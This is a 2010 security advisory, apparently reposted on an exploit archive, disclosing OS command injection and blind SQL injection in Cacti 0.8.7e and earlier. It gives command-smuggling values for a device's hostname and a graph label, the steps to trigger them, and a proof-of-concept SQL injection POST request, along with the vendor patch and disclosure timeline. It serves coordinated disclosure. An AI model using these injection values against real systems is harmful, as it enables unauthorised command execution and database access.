Cacti Version <= 0.8.7e OS Command Injection Vulnerability

2010-04-22T00:00:00
ID 1337DAY-ID-11936
Type zdt
Reporter Nahuel Grisolia
Modified 2010-04-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==========================================================
Cacti Version <= 0.8.7e OS Command Injection Vulnerability
==========================================================

CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Cacti is prone to a remote command execution vulnerability because the
software fails to adequately sanitize user-suplied input.
Successful attacks can compromise the affected software and possibly
the operating system running Cacti.
The vulnerability can be triggered by any user doing:
1)
Edit or Create a Device with FQDN ‘NotARealIPAddress;CMD;’ (without
single quotes) and Save it.
Edit the Device again and reload any data query already created.
CMD will be executed with Web Server rights.
2)
Edit or Create a Graph Template and use as Vertical Label
‘BonsaiSecLabel";CMD; "’ (without single quotes) and Save it.
Go to Graph Management section and Select it.
CMD will be executed with Web Server rights.
Note that other properties of a Graph Template might also be affected.

1. Advisory Information

Advisory ID: BONSAI-2010-0104
Date published: 2010-04-21
Vendors contacted: Cacti
Release mode: Coordinated release


2. Vulnerability Information

Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: To be Defined


3. Software Description

Cacti is a complete network graphing solution designed to harness the
power of RRDTool's data storage and graphing functionality. Cacti
provides a fast poller, advanced graph templating, multiple data
acquisition methods, and user management features out of the box. All of
this is wrapped in an intuitive, easy to use interface that makes sense
for LAN-sized installations up to complex networks with hundreds of
devices [0]


4. Vulnerability Description

Injection flaws, such as SQL, OS, and LDAP injection, occur when
untrusted data is sent to an interpreter as part of a command or query.
The attacker’s hostile data can trick the interpreter into executing
unintended commands or accessing unauthorized data.

For additional information please read [1] (A1 - Injection)


5. Vulnerable packages

Version <= 0.8.7e


6. Non-vulnerable packages

New version is not available. However, developers released a patch for
the SQL Injection vulnerability and can be found at the following code:

--- cacti-0.8.7e/templates_export.php	2009-06-28 12:07:11.000000000 -0400
+++ cacti-fixed/templates_export.php	2010-04-17 14:08:42.000000000 -0400
@@ -49,6 +49,10 @@
 function form_save() {
 	global $export_types;
 
+    /* ================= input validation ================= */
+    input_validate_input_number(get_request_var_post("export_item_id"));
+    /* ==================================================== */
+
 	if (isset($_POST["save_component_export"])) {
 		$xml_data = get_item_xml($_POST["export_type"], $_POST["export_item_id"], (((isset($_POST["include_deps"]) ? $_POST["include_deps"] : "") == "") ? false : true));

7. Credits

This vulnerability was discovered by Nahuel Grisolia ( nahuel -at-
bonsai-sec.com ).


8. Technical Description

8.1 Blind SQL Injection

CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)

A Vulnerability has been discovered in Cacti, which can be exploited by
any user to conduct SQL Injection attacks. Input passed via the
“export_item_id” parameter to “templates_export.php” script is not
properly sanitized before being used in a SQL query.

This can be exploited to manipulate SQL queries by injecting arbitrary
SQL code.

The following is a Proof of Concept POST request:

POST /cacti-0.8.7e/templates_export.php HTTP/1.1
Host: 192.168.1.107
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.107/cacti-0.8.7e/templates_export.php
Cookie: clickedFolder=tree_1%5Etree_1_leaf_7%5E;
highlightedTreeviewLink=tree_1_leaf_7;
Cacti=563bb99868dfa24cc70982bf80c5c03e
Content-Type: application/x-www-form-urlencoded
Content-Length: 130

export_item_id=18 and
1=1&include_deps=on&output_format=3&export_type=graph_template&
save_component_export=1&action=save&x=24&y=12


9. Report Timeline

2010-04-03:
Vulnerabilities were identified.
2010-04-06:
Vendor Contacted
2010-04-17:
Vendor released a patch for the SQL Injection
2010-04-21:
The advisory BONSAI-2010-0104 is published.


10. References

[0] http://www.cacti.net/

[1] http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project


11. About Bonsai

Bonsai is a company involved in providing professional computer
information security services. Currently a sound growth company, since
its foundation in early 2009 in Buenos Aires, Argentina, we are fully
committed to quality service, and focused on our customers real needs.





#  0day.today [2018-04-15]  #